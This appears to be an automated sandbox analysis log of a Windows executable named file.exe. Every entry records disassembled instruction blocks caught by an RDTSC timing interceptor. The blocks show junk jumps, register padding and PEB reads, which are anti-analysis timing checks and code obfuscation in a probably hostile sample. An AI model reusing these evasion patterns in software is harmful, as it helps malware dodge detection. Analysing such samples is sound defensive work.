Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1B09 second address: 49F1B0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1B0F second address: 49F1B20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edi 0x00000005 push ecx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1B20 second address: 49F1B24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1B24 second address: 49F1B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1B2A second address: 49F1B67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 mov edx, ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FCBA4817E7Bh 0x00000015 adc ch, FFFFFFAEh 0x00000018 jmp 00007FCBA4817E89h 0x0000001d popfd 0x0000001e mov si, EA37h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1B67 second address: 49F1B6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1933 second address: 49F1958 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c movzx esi, bx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1958 second address: 49F195C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F195C second address: 49F1975 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E85h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1975 second address: 49F197B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4990A0B second address: 4990A75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FCBA4817E86h 0x0000000f mov ebp, esp 0x00000011 jmp 00007FCBA4817E80h 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FCBA4817E7Dh 0x00000020 sub eax, 16795346h 0x00000026 jmp 00007FCBA4817E81h 0x0000002b popfd 0x0000002c mov bx, cx 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49C078D second address: 49C07FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx eax, bx 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a jmp 00007FCBA46BC73Eh 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FCBA46BC740h 0x00000015 mov ebp, esp 0x00000017 jmp 00007FCBA46BC740h 0x0000001c push dword ptr [ebp+04h] 0x0000001f jmp 00007FCBA46BC740h 0x00000024 push dword ptr [ebp+0Ch] 0x00000027 pushad 0x00000028 mov bx, si 0x0000002b movzx esi, di 0x0000002e popad 0x0000002f push dword ptr [ebp+08h] 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FCBA46BC740h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49A0CF8 second address: 49A0D16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov bx, 7122h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49805C5 second address: 49805CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49805CB second address: 49806D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FCBA4817E80h 0x0000000f push eax 0x00000010 jmp 00007FCBA4817E7Bh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007FCBA4817E86h 0x0000001b mov ebp, esp 0x0000001d jmp 00007FCBA4817E80h 0x00000022 mov ecx, dword ptr [ebp+08h] 0x00000025 pushad 0x00000026 movzx eax, bx 0x00000029 pushfd 0x0000002a jmp 00007FCBA4817E83h 0x0000002f add ah, FFFFFF9Eh 0x00000032 jmp 00007FCBA4817E89h 0x00000037 popfd 0x00000038 popad 0x00000039 sub eax, eax 0x0000003b jmp 00007FCBA4817E87h 0x00000040 inc eax 0x00000041 pushad 0x00000042 movzx eax, di 0x00000045 mov dx, 7874h 0x00000049 popad 0x0000004a lock xadd dword ptr [ecx], eax 0x0000004e pushad 0x0000004f mov dx, 620Ch 0x00000053 pushad 0x00000054 pushad 0x00000055 popad 0x00000056 pushfd 0x00000057 jmp 00007FCBA4817E81h 0x0000005c xor cx, F0E6h 0x00000061 jmp 00007FCBA4817E81h 0x00000066 popfd 0x00000067 popad 0x00000068 popad 0x00000069 inc eax 0x0000006a jmp 00007FCBA4817E7Eh 0x0000006f pop ebp 0x00000070 pushad 0x00000071 push eax 0x00000072 push edx 0x00000073 mov dx, ax 0x00000076 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F002A second address: 49F005F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC749h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FCBA46BC741h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F005F second address: 49F0066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bh, 77h 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0066 second address: 49F006C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F006C second address: 49F0070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0070 second address: 49F014F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FCBA46BC73Eh 0x00000012 mov eax, dword ptr fs:[00000030h] 0x00000018 jmp 00007FCBA46BC740h 0x0000001d sub esp, 18h 0x00000020 pushad 0x00000021 jmp 00007FCBA46BC73Eh 0x00000026 jmp 00007FCBA46BC742h 0x0000002b popad 0x0000002c xchg eax, ebx 0x0000002d jmp 00007FCBA46BC740h 0x00000032 push eax 0x00000033 pushad 0x00000034 mov bh, BBh 0x00000036 mov bl, ch 0x00000038 popad 0x00000039 xchg eax, ebx 0x0000003a pushad 0x0000003b jmp 00007FCBA46BC73Bh 0x00000040 pushfd 0x00000041 jmp 00007FCBA46BC748h 0x00000046 sbb al, 00000058h 0x00000049 jmp 00007FCBA46BC73Bh 0x0000004e popfd 0x0000004f popad 0x00000050 mov ebx, dword ptr [eax+10h] 0x00000053 jmp 00007FCBA46BC746h 0x00000058 xchg eax, esi 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007FCBA46BC747h 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F014F second address: 49F0179 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 72A0E28Ah 0x00000008 call 00007FCBA4817E7Bh 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007FCBA4817E7Eh 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0179 second address: 49F017F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F017F second address: 49F0183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0183 second address: 49F0187 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0187 second address: 49F01A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a mov ax, bx 0x0000000d mov cx, dx 0x00000010 popad 0x00000011 mov esi, dword ptr [772406ECh] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F01A4 second address: 49F01AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F01AA second address: 49F0210 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007FCBA4817E7Eh 0x00000010 jne 00007FCBA4818D8Eh 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FCBA4817E7Eh 0x0000001d add cx, BB68h 0x00000022 jmp 00007FCBA4817E7Bh 0x00000027 popfd 0x00000028 call 00007FCBA4817E88h 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0210 second address: 49F024A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push ecx 0x00000007 jmp 00007FCBA46BC73Ch 0x0000000c mov dword ptr [esp], edi 0x0000000f jmp 00007FCBA46BC740h 0x00000014 call dword ptr [77210B60h] 0x0000001a mov eax, 766BE5E0h 0x0000001f ret 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FCBA46BC73Ah 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F024A second address: 49F0259 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0259 second address: 49F0261 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0261 second address: 49F0272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push 00000044h 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ecx, edx 0x0000000e mov dl, DDh 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0272 second address: 49F0278 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0278 second address: 49F027C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F027C second address: 49F0293 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 pushad 0x0000000a call 00007FCBA46BC73Bh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0293 second address: 49F02D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 call 00007FCBA4817E7Fh 0x0000000a pushfd 0x0000000b jmp 00007FCBA4817E88h 0x00000010 or al, 00000078h 0x00000013 jmp 00007FCBA4817E7Bh 0x00000018 popfd 0x00000019 pop ecx 0x0000001a popad 0x0000001b push esp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F02D8 second address: 49F02DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F02DC second address: 49F02E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F02E2 second address: 49F02E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F02E8 second address: 49F02EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F02EC second address: 49F0306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FCBA46BC73Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0306 second address: 49F032C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FCBA4817E7Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F032C second address: 49F0366 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000030h] 0x0000000f jmp 00007FCBA46BC73Eh 0x00000014 push dword ptr [eax+18h] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FCBA46BC73Ah 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0366 second address: 49F036C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0453 second address: 49F0457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0457 second address: 49F045B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F045B second address: 49F0461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0461 second address: 49F0496 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+10h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FCBA4817E85h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0496 second address: 49F049C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F049C second address: 49F04A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F04A0 second address: 49F04F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC743h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+50h] 0x0000000e pushad 0x0000000f movzx ecx, bx 0x00000012 movsx edi, cx 0x00000015 popad 0x00000016 mov dword ptr [esi+14h], eax 0x00000019 jmp 00007FCBA46BC748h 0x0000001e mov eax, dword ptr [ebx+54h] 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FCBA46BC73Ah 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F04F0 second address: 49F04F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F04F6 second address: 49F04FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F04FC second address: 49F0500 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0500 second address: 49F053B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+18h], eax 0x0000000b jmp 00007FCBA46BC744h 0x00000010 mov eax, dword ptr [ebx+58h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FCBA46BC747h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F053B second address: 49F058E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FCBA4817E7Fh 0x00000008 pop eax 0x00000009 mov dx, D3ECh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esi+1Ch], eax 0x00000013 jmp 00007FCBA4817E7Bh 0x00000018 mov eax, dword ptr [ebx+5Ch] 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushfd 0x0000001f jmp 00007FCBA4817E82h 0x00000024 sub ecx, 5AA30D38h 0x0000002a jmp 00007FCBA4817E7Bh 0x0000002f popfd 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F058E second address: 49F0599 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0599 second address: 49F059D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F059D second address: 49F05AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esi+20h], eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b mov al, 3Dh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F05AA second address: 49F05EB instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FCBA4817E7Bh 0x00000008 and eax, 0CE1D7AEh 0x0000000e jmp 00007FCBA4817E89h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 mov al, BFh 0x00000019 mov ebx, 4216C50Eh 0x0000001e popad 0x0000001f popad 0x00000020 mov eax, dword ptr [ebx+60h] 0x00000023 pushad 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F05EB second address: 49F060C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FCBA46BC73Dh 0x0000000c popad 0x0000000d mov dword ptr [esi+24h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov ebx, 7B8DE26Eh 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F060C second address: 49F063C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+64h] 0x0000000c jmp 00007FCBA4817E80h 0x00000011 mov dword ptr [esi+28h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F063C second address: 49F0640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0640 second address: 49F065D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F065D second address: 49F072C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+68h] 0x0000000c pushad 0x0000000d pushad 0x0000000e mov ax, BA89h 0x00000012 mov al, 76h 0x00000014 popad 0x00000015 pushfd 0x00000016 jmp 00007FCBA46BC73Bh 0x0000001b sub ax, 833Eh 0x00000020 jmp 00007FCBA46BC749h 0x00000025 popfd 0x00000026 popad 0x00000027 mov dword ptr [esi+2Ch], eax 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007FCBA46BC73Ch 0x00000031 xor cl, 00000038h 0x00000034 jmp 00007FCBA46BC73Bh 0x00000039 popfd 0x0000003a pushfd 0x0000003b jmp 00007FCBA46BC748h 0x00000040 adc si, 1A98h 0x00000045 jmp 00007FCBA46BC73Bh 0x0000004a popfd 0x0000004b popad 0x0000004c mov ax, word ptr [ebx+6Ch] 0x00000050 jmp 00007FCBA46BC746h 0x00000055 mov word ptr [esi+30h], ax 0x00000059 pushad 0x0000005a mov cx, 460Dh 0x0000005e mov eax, 276D3609h 0x00000063 popad 0x00000064 mov ax, word ptr [ebx+00000088h] 0x0000006b push eax 0x0000006c push edx 0x0000006d pushad 0x0000006e mov ax, dx 0x00000071 popad 0x00000072 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F072C second address: 49F0732 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0732 second address: 49F0736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0736 second address: 49F083D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [esi+32h], ax 0x0000000c pushad 0x0000000d jmp 00007FCBA4817E89h 0x00000012 popad 0x00000013 mov eax, dword ptr [ebx+0000008Ch] 0x00000019 jmp 00007FCBA4817E7Eh 0x0000001e mov dword ptr [esi+34h], eax 0x00000021 jmp 00007FCBA4817E80h 0x00000026 mov eax, dword ptr [ebx+18h] 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007FCBA4817E7Eh 0x00000030 and si, 8348h 0x00000035 jmp 00007FCBA4817E7Bh 0x0000003a popfd 0x0000003b pushfd 0x0000003c jmp 00007FCBA4817E88h 0x00000041 jmp 00007FCBA4817E85h 0x00000046 popfd 0x00000047 popad 0x00000048 mov dword ptr [esi+38h], eax 0x0000004b pushad 0x0000004c pushad 0x0000004d mov edi, ecx 0x0000004f pushfd 0x00000050 jmp 00007FCBA4817E86h 0x00000055 or ax, 3338h 0x0000005a jmp 00007FCBA4817E7Bh 0x0000005f popfd 0x00000060 popad 0x00000061 pushad 0x00000062 mov si, D705h 0x00000066 jmp 00007FCBA4817E82h 0x0000006b popad 0x0000006c popad 0x0000006d mov eax, dword ptr [ebx+1Ch] 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007FCBA4817E87h 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F083D second address: 49F0852 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+3Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ax, dx 0x00000011 movsx ebx, cx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0852 second address: 49F08EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCBA4817E87h 0x00000008 pushfd 0x00000009 jmp 00007FCBA4817E88h 0x0000000e jmp 00007FCBA4817E85h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, dword ptr [ebx+20h] 0x0000001a pushad 0x0000001b mov eax, 37EDEE83h 0x00000020 pushfd 0x00000021 jmp 00007FCBA4817E88h 0x00000026 and si, D648h 0x0000002b jmp 00007FCBA4817E7Bh 0x00000030 popfd 0x00000031 popad 0x00000032 mov dword ptr [esi+40h], eax 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FCBA4817E85h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F08EC second address: 49F0956 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007FCBA46BC743h 0x0000000b sub cx, 8DEEh 0x00000010 jmp 00007FCBA46BC749h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 lea eax, dword ptr [ebx+00000080h] 0x0000001f jmp 00007FCBA46BC73Eh 0x00000024 push 00000001h 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FCBA46BC747h 0x0000002d rdtsc
